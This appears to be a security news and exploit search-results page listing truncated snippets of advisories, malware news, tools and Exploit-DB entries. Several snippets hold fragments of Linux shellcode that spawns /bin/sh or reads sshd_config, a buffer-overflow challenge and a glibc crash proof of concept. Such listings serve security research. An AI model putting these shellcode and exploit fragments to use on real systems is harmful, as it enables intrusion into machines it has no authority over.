89 matches found
exploit-database
This is an official repository of The Exploit Database, a project sponsored by Offensive Security. The repository contains exploits, shellcodes, and papers for various vulnerabilities in different software and systems. The exploits are categorized by operating system, software, and vulnerability...
Vulnerability Spotlight: Remote code execution bug in SQLite
Cory Duplantis of Cisco Talos discovered this vulnerability. Executive summary: SQLite contains an exploitable use-after-free vulnerability that could allow an attacker to gain the ability to remotely execute code on the victim machine. SQLite is a client-side database management system contained i...
BoF-Challenge2
On this simple stack-based buffer overflow you need to identify the vulnerable function and the buffer to overflow, then inject your payload and get a local shell. include include void func char buf100; getsbuf; printf"You entered: %s\n", buf; int mainint argc, char argv func; return 0;...
Chafer APT Takes Aim at Diplomats in Iran with Improved Custom Malware
UPDATE An Iran-linked APT known as Chafer has been spotted targeting various entities based in Iran with an enhanced version of a custom malware that takes a very unique approach to communication by using the Microsoft Background Intelligent Transfer Service (BITS) mechanism over HTTP. Meanwhile th...
Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes
/ Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes Author: Goutham Madhwaraj Tested on: i686 GNU/Linux Shellcode Length: 44 ShoutOut - BarrierSec gcc -fno-stack-protector -z execstack loader-bind.c -o Disassembly of section .text: 08048080 : 8048080: 31 c0 xor eax,eax 8048082: 50...
UBoat - HTTP Botnet Project
A POC HTTP Botnet designed to replicate a full weaponised commercial botnet. Disclaimer This project should be used for authorized testing or educational purposes only. The main objective behind creating this offensive project was to aid security researchers and to enhance the understanding of...
Detecting Kernel Memory Disclosure – Whitepaper
Posted by Mateusz Jurczyk, Project Zero Since early 2017, we have been working on Bochspwn Reloaded – a piece of dynamic binary instrumentation built on top of the Bochs IA-32 software emulator, designed to identify memory disclosure vulnerabilities in operating system kernels. Over the course of...
Linux/x86 execve /bin/sh Encoded Shellcode (44 bytes)
/ ; Title : Execve /bin/sh Shellcode encoded with ROT-13 + RShift-2 + XOR ; Date : April, 2018 ; Author : Nuno Freitas ; Blog Post : https://bufferoverflowed.wordpress.com/slae32/slae-32-shellcode-encoder/ ; Twitter : @nunof11 ; SLAE ID : SLAE-1112 ; Size : 44 bytes ; Tested on : i686 GNU/Linux...
CVE-2017-18190
CVE-2017-18190 affects the CUPS printing system. Connected sources confirm a vulnerability where a localhost.localdomain whitelist entry in valid_host() (scheduler/client.c) in CUPS before 2.2.2 allows remote attackers to execute arbitrary IPP commands by sending POST requests to the CUPS daemon ...
Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)
Linux/x86-64 - Execute /bin/sh Shellcode 24 bytes. Shellcode exploit for Linux/x86-64 platform / global start section .text start: push 59 pop rax cdq push rdx mov rbx,0x68732f6e69622f2f push rbx push rsp pop rdi push rdx push rdi push rsp pop rsi syscall / include include char code =...
Researcher Claims Samsung's Tizen OS is Poorly Programmed; Contains 27,000 Bugs!
A researcher has claimed that Samsung's Tizen operating system that runs on millions of Samsung products is so poorly programmed that it could contain nearly 27,000 programming errors, which could also lead to thousands of vulnerabilities. Tizen is a Linux-based open-source operating system backe...
High Performance DNS Stub Resolver: MassDNS
A high performance DNS stub resolver in C. MassDNS is a simple high-performance DNS stub resolver targeting those who seek to resolve a massive amount of domain names in the order of millions or even billions. Without special configuration, MassDNS is capable of resolving over 100,000,000 domains...
Open Source CAN Network Analysis: BUSMASTER
Open Source CAN Network Analysis. BUSMASTER is an open source PC software for the design, monitoring, analysis, and simulation of CAN networks. Using its powerful functions and user-programmability one can simulate CAN system of any complexity. Additionally it provides options to analyze data byte...
Warning! This Cross-Platform Malware Can Hack Windows, Linux and OS X Computers
Unlike specially crafted malware specifically developed to take advantage of Windows operating system platform, cyber attackers have started creating cross-platform malware for wider exploitation. Due to the rise in popularity of Mac OS X and other Windows desktop alternatives, hackers have begun...
Multi Gigabit Packet Capturing: PFQ
PFQ is a functional networking framework designed for the Linux operating system that allows efficient packets capture/transmission 10G and beyond, in-kernel functional processing and packets steering across sockets/end-points. PFQ is highly optimized for multi-core architecture, as well as for...
Learn C++ - Dangerous filesystem permissions, WebView code execution vulnerabilities
HackApp vulnerability scanner discovered that application Learn C++ published at the 'play' market has multiple vulnerabilities...
[SECURITY] Fedora 23 Update: gummi-0.6.6-1.fc23
Gummi is a LaTeX editor written in the C programming language using the GTK+ interface toolkit. It was designed with simplicity and the novice user in mind, but also offers features that speak to the more advanced user...
[SECURITY] Fedora 22 Update: gummi-0.6.6-1.fc22
Gummi is a LaTeX editor written in the C programming language using the GTK+ interface toolkit. It was designed with simplicity and the novice user in mind, but also offers features that speak to the more advanced user...
DropBearSSHD 2015.71 - Command Injection
Exploit for linux platform in category remote exploits VuNote ============ Author: Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3116 Version: 0.2 Date: Mar 3rd, 2016 Tag: dropbearsshd xauth command injection may lead to forced-command bypass Overview -------- Name: dropbear...
glibc catopen() Unbounded Stack Allocations
glibc catopen Multiple unbounded stack allocations URL: https://cxsecurity.com/issue/WLB-2016010149 --------------------------------------- PoC: include include include int main char buff; buff=malloc11111111; memsetbuff,'A',11111110; buff11111110='\0'; catopenbuff, NLCATLOCALE; return 0;...